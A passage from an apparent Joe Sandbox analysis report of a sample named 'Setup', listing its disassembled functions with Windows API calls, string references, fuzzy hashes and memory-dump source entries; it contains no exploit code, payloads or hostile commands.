.jar, xrefs: 0088E67F
.pack, xrefs: 0088E5A1
&_', xrefs: 0088E1E7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ByteCharMultiWide$ObjectSingleWait
String ID: *.*$.jar$.pack$&_'
API String ID: 3339361032-3826877194
Opcode ID: 74c9c077b4c5077b4a85367f63190c6d0a7ca8ba18dc7e1f89d0dc6b92759e87
Instruction ID: 194bc69744e35d6ab825dcc1a89844f8dabad8bb3c128a85ac0df0d35620acc0
Opcode Fuzzy Hash: 74c9c077b4c5077b4a85367f63190c6d0a7ca8ba18dc7e1f89d0dc6b92759e87
Instruction Fuzzy Hash: 55617070A006199FDF04DFA9C894BAEBBB5FF48324F154269E821E7391CB34AD01CB95

Function 008683F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00862F26,00000000,?,00000000,00000000,?,00000000,?,?,?,00862F26,?,00000003), ref: 008684BD
GetLastError.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,00862F26,?,00000003,00000009,275F26E1,00000000), ref: 008684CE
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00862F26,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 008684EF
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00862F26,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00868541

Strings

&_', xrefs: 008685D1

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID: &_'
API String ID: 1717984340-2411122644
Opcode ID: 397f5a2dd1ab93265bbff2c3d7196c39ed7118338f869cc2264e4627fb2f8533
Instruction ID: 9bf052ab12f697826fe0e3698cefc80f136fc267a82d149aedf4cfdb3b77c3c1
Opcode Fuzzy Hash: 397f5a2dd1ab93265bbff2c3d7196c39ed7118338f869cc2264e4627fb2f8533
Instruction Fuzzy Hash: 405149B1604309EBDB205FA49C86F2A7699FF44304F154739FA4AEA181EF72D9008796

Function 0085CFF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 0085D052
GetShortPathNameW.KERNEL32(?,?,?), ref: 0085D0D1
WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0085D121
WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,00000000,00000000), ref: 0085D157

Strings

&_', xrefs: 0085D007

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ByteCharMultiNamePathShortWide
String ID: &_'
API String ID: 3379522384-2411122644
Opcode ID: a6f65d5b0eb295515ba4b24e8bb2906b746d8885e61b84b5ca1be1eea2dedec6
Instruction ID: b9345461b25051e7fe6293d6ff849fa3cfb672f3449d1f72a07461d8b4a19c45
Opcode Fuzzy Hash: a6f65d5b0eb295515ba4b24e8bb2906b746d8885e61b84b5ca1be1eea2dedec6
Instruction Fuzzy Hash: 5D51AE71604615AFDB14DFA8CC89B6EFBA5FF44325F108229E911DB2E0DB71A805CB94

Function 006F6C60 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 169registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008334C0: GetModuleFileNameW.KERNEL32(00000000,?,00000400,275F26E1), ref: 0083351D

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,00A67E94,80000001,00000001,00000000,?,275F26E1), ref: 006F6CF2
RegCloseKey.ADVAPI32(?,?,?), ref: 006F6D83
RegCloseKey.ADVAPI32(00000000,275F26E1,?,?,00000000,0093FA23,000000FF), ref: 006F6E62

Strings

&_', xrefs: 006F6C77, 006F6E23
&_', xrefs: 006F6C8B, 006F6CAC

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Close$FileModuleNameQueryValue
String ID: &_'$&_'
API String ID: 3856985302-224754792
Opcode ID: 9920522438a4eafdd8c6a9ddedf4686568eb459a918c5fe43eb3acbcbd5a6f8e
Instruction ID: 44eb9b04d7bb25ee7d5c017cb59e1b6b54dae88ac13f1079bd295c895125fdb2
Opcode Fuzzy Hash: 9920522438a4eafdd8c6a9ddedf4686568eb459a918c5fe43eb3acbcbd5a6f8e
Instruction Fuzzy Hash: D9518A70A0024CAFDB14DFA8CC55BEEB7B9FF04714F10866CE519A7280DB74AA48CB91

Function 0088AE60 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(000000A3,80000000,00000003,00000000,00000003,00000080,00000000,275F26E1,00000000,Function_0002A540), ref: 0088AEAA
GetFileSize.KERNEL32(00000000,00000000), ref: 0088AEDB
ReadFile.KERNEL32(?,00000000,00010000,?,00000000,00010000), ref: 0088AF6B
CloseHandle.KERNEL32(00000000), ref: 0088B036

Strings

&_', xrefs: 0088AE77

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID: &_'
API String ID: 3919263394-2411122644
Opcode ID: 1e39bdc79e39c2d5aecf9068c4660c56ca24abfbdacdb450fcb666493c1ae1b5
Instruction ID: e1d6f0619298f9cfdb9f9f7c0caec37fc37f9ff5c41531b1c005c78c09a7c6ee
Opcode Fuzzy Hash: 1e39bdc79e39c2d5aecf9068c4660c56ca24abfbdacdb450fcb666493c1ae1b5
Instruction Fuzzy Hash: BF51E2B1E042189BEB209F68CC857EEFBB4FF51314F20819AE559E7281DB701A89CB51

Function 007D4C60 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 007D4CF2
GetWindowRect.USER32(?,?), ref: 007D4D0A
GetWindowRect.USER32(?,?), ref: 007D4D76
GetWindowLongW.USER32(?,000000EC), ref: 007D4D9A

Strings

&_', xrefs: 007D4C63

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Window$Rect$Long
String ID: &_'
API String ID: 3486571012-2411122644
Opcode ID: 3e74bc222dd6d07c48c6ea7630326a7450ccd51bfcd3ff3fd6e0b989488fa5b7
Instruction ID: b5ca56f20b86d82d959aba5584d8457fb79c8b15c93f96a8f7841340be16cf59
Opcode Fuzzy Hash: 3e74bc222dd6d07c48c6ea7630326a7450ccd51bfcd3ff3fd6e0b989488fa5b7
Instruction Fuzzy Hash: CB417F326083049FC750CF65D984AABB7F9FF99704F04462EF94997210E730E9818B52

Function 00702BA0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000FC,00000000), ref: 00702BF6
GetParent.USER32(?), ref: 00702C2A

Part of subcall function 00911069: GetProcessHeap.KERNEL32(00000008,00000008,00000000,00872C81,?,?,?), ref: 0091106E
Part of subcall function 00911069: HeapAlloc.KERNEL32(00000000,?,?,?), ref: 00911075

SetWindowLongW.USER32(?,000000EB), ref: 00702C71
ShowWindow.USER32(?,00000000), ref: 00702C93

Strings

&_', xrefs: 00702BA3

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Window$HeapLong$AllocParentProcessShow
String ID: &_'
API String ID: 78937335-2411122644
Opcode ID: e52a4f7bdaefeac83c44f20af996bcaa69cc391c81dd423de830c3e0c73a068b
Instruction ID: 60dacc386cb33bbb0b18445eda6fa020c97b64d14e39f6d3af93a67ac9606cf6
Opcode Fuzzy Hash: e52a4f7bdaefeac83c44f20af996bcaa69cc391c81dd423de830c3e0c73a068b
Instruction Fuzzy Hash: 1831AF757042049FDB04EF29DC85A6BBBE8FF89710B404299FC19DB292DB34DC418BA1

Function 00700220 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

VariantClear.OLEAUT32 ref: 007002D3

Strings

&_', xrefs: 00700230
&_', xrefs: 00700273
&_', xrefs: 00700233, 007002C1
&_', xrefs: 0070023B, 007002C9, 007002D9

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ClearHeapProcessVariant
String ID: &_'$&_'$&_'$&_'
API String ID: 2763251331-3821909649
Opcode ID: 9896c4930cdf9e573cdce49e2f9c22ca9b7534c0143f31f5219ba9f91b24b67f
Instruction ID: 765ed7c8d6eb275b5a0fbfcd8d011f3526da55f617d7330a4dd6817641b4badd
Opcode Fuzzy Hash: 9896c4930cdf9e573cdce49e2f9c22ca9b7534c0143f31f5219ba9f91b24b67f
Instruction Fuzzy Hash: AA118172604648EFCB15CF98DC01B5AB7B9FB49B20F11466EFC2597780DB35A9008B84

Function 0084CE60 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00911995: AcquireSRWLockExclusive.KERNEL32(00A66A70,?,?,?,006EB3A6,00A67624,275F26E1,?,?,0093CBDD,000000FF,?,008898BD,275F26E1,?), ref: 009119A0
Part of subcall function 00911995: ReleaseSRWLockExclusive.KERNEL32(00A66A70,?,?,006EB3A6,00A67624,275F26E1,?,?,0093CBDD,000000FF,?,008898BD,275F26E1,?), ref: 009119DA

LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 0084CEBE
GetProcAddress.KERNEL32(00000000), ref: 0084CEC5

Part of subcall function 00911944: AcquireSRWLockExclusive.KERNEL32(00A66A70,?,?,006EB417,00A67624,009A5310), ref: 0091194E
Part of subcall function 00911944: ReleaseSRWLockExclusive.KERNEL32(00A66A70,?,?,006EB417,00A67624,009A5310), ref: 00911981
Part of subcall function 00911944: WakeAllConditionVariable.KERNEL32(00A66A6C,?,?,006EB417,00A67624,009A5310), ref: 0091198C

Strings

SymFromAddr, xrefs: 0084CEB4
Dbghelp.dll, xrefs: 0084CEB9
&_', xrefs: 0084CE71

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease$AddressConditionLibraryLoadProcVariableWake
String ID: Dbghelp.dll$SymFromAddr$&_'
API String ID: 1702099962-1966616050
Opcode ID: 6a7b788d2a7b8f28e16b95e0d041e0c6b794c1459c4a13d892ebc84996196844
Instruction ID: 51a45893f84f92a85dd9c7b1e61bbf4a37195577efbfd28e7962187b9892a54e
Opcode Fuzzy Hash: 6a7b788d2a7b8f28e16b95e0d041e0c6b794c1459c4a13d892ebc84996196844
Instruction Fuzzy Hash: B301B1B6A44644EFCB50CF94ED45B58B3F4FB49724F104225E821C33D0D7756801CE11

Function 0092C05A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0092BFC4,?,?,?,?,?,0092C0E8,0000001A,AppPolicyGetProcessTerminationMethod,009D0548,AppPolicyGetProcessTerminationMethod,?), ref: 0092C069
GetLastError.KERNEL32(?,0092BFC4,?,?,?,?,?,0092C0E8,0000001A,AppPolicyGetProcessTerminationMethod,009D0548,AppPolicyGetProcessTerminationMethod,?,?,0092C64C,00000000), ref: 0092C073
LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 0092C0B1

Strings

ext-ms-, xrefs: 0092C096
api-ms-, xrefs: 0092C080

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-$ext-ms-
API String ID: 3177248105-537541572
Opcode ID: 0c4d7cd0a911149cc06f2828fb10b2dd9d90e171cb0e1cddd22dcea5cbdb7530
Instruction ID: 40ab8c90f853e39e819b1a7a24446694a91e208a3045620bff1d88c3c2c3d6cd
Opcode Fuzzy Hash: 0c4d7cd0a911149cc06f2828fb10b2dd9d90e171cb0e1cddd22dcea5cbdb7530
Instruction Fuzzy Hash: 8CF01C71AC8219F7EF202B61EC07B597A69AF80B54F144031FE0DA84E5EBA2D950D6D1

Function 0074AEA0 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 278memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00000000,?), ref: 0074B11A
HeapFree.KERNEL32(00000000,?,?,?,00000000,?), ref: 0074B120
GetProcessHeap.KERNEL32(?,?,?), ref: 0074B17A
HeapFree.KERNEL32(00000000,?,?,?), ref: 0074B180

Strings

&_', xrefs: 0074AEB7, 0074AFE4

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Heap$FreeProcess
String ID: &_'
API String ID: 3859560861-2411122644
Opcode ID: dc3f7aefdc65b536f2645fa8ba58b8749e82916ed89e23c5aea8ca87c8acc3a9
Instruction ID: 5da475318313f36748acc79e22f47ffb507b6b98e62e0b705474dfa65efc8029
Opcode Fuzzy Hash: dc3f7aefdc65b536f2645fa8ba58b8749e82916ed89e23c5aea8ca87c8acc3a9
Instruction Fuzzy Hash: 4EB1CDB1901248EFDB14DFA8C854BEEFBB5EF54314F10426AE415A7291DB38EE09CB91

Function 006F8DF0 Relevance: 7.6, APIs: 5, Instructions: 132windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 006F8E4F
GetDlgItem.USER32(?,?), ref: 006F8E74
SendMessageW.USER32(?,?,?,?), ref: 006F8F48

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ItemMessageSendWindow
String ID:
API String ID: 799199299-0
Opcode ID: 800bff010bbce911ef4900292965a21e6638f0c0105faa563861e1dcba5231f4
Instruction ID: 3a4ea63027699559c3da7a1490ea60eef776b0046db06aa7586ba6ff506dfa88
Opcode Fuzzy Hash: 800bff010bbce911ef4900292965a21e6638f0c0105faa563861e1dcba5231f4
Instruction Fuzzy Hash: 3B41D5322052099FD718CF18DC98EB6B7A7FB84351F1449AAE65AC7661DF32EC10DB60

Function 007100B0 Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 007100BA
SendMessageW.USER32(?,?,?,0000102B), ref: 00710111
SendMessageW.USER32(?,?,?,0000102B), ref: 00710164
SendMessageW.USER32(?,00001043,00000000,00000000), ref: 00710179
SendMessageW.USER32(?,00001013,00000000,00000000), ref: 0071018A

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 69f9870680525bde607951b54f81f8824ad4ae2b3120d2a8be69857804ecca84
Instruction ID: ab34aa6014cc61ee35ea3c304f01c6a5b9dde2ee281713b49d6f809f6be8e240
Opcode Fuzzy Hash: 69f9870680525bde607951b54f81f8824ad4ae2b3120d2a8be69857804ecca84
Instruction Fuzzy Hash: 8C212C31918386ABD320CF54CE45B5ABBE5BBDDB18F206B0DF18461094E7F595848A86

Function 00728930 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 410COMMON

Download Yara Rule

APIs

GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,275F26E1), ref: 007289EE
GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 00728A13
GetLastError.KERNEL32 ref: 00728A1D

Strings

&_', xrefs: 00728947, 00728CD9

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: DriveLogicalStrings$ErrorLast
String ID: &_'
API String ID: 573936702-2411122644
Opcode ID: b96e029900826baffdbd23795ea5953bc2d3f21585d0698fb6818f2a28614d87
Instruction ID: fa2c3dd676f3727e320e9b37a9c14181a68464bdba65466abcbb30d846de29b1
Opcode Fuzzy Hash: b96e029900826baffdbd23795ea5953bc2d3f21585d0698fb6818f2a28614d87
Instruction Fuzzy Hash: BB02AC71D01268DFCF24DFA4D844BDEBBB5BF14300F14459DE455AB281EB35AA48CBA2

Function 006F62E0 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 268windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,AtlAxWin140,?,?,?,80000000,00000000,00000000,?,00000000,00000000), ref: 006F6362
SendMessageW.USER32(00000008,00000000,00000000,00000000), ref: 006F6451

Part of subcall function 006F8110: SysFreeString.OLEAUT32(00000000), ref: 006F81D0

Strings

&_', xrefs: 006F62F7
AtlAxWin140, xrefs: 006F635A

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

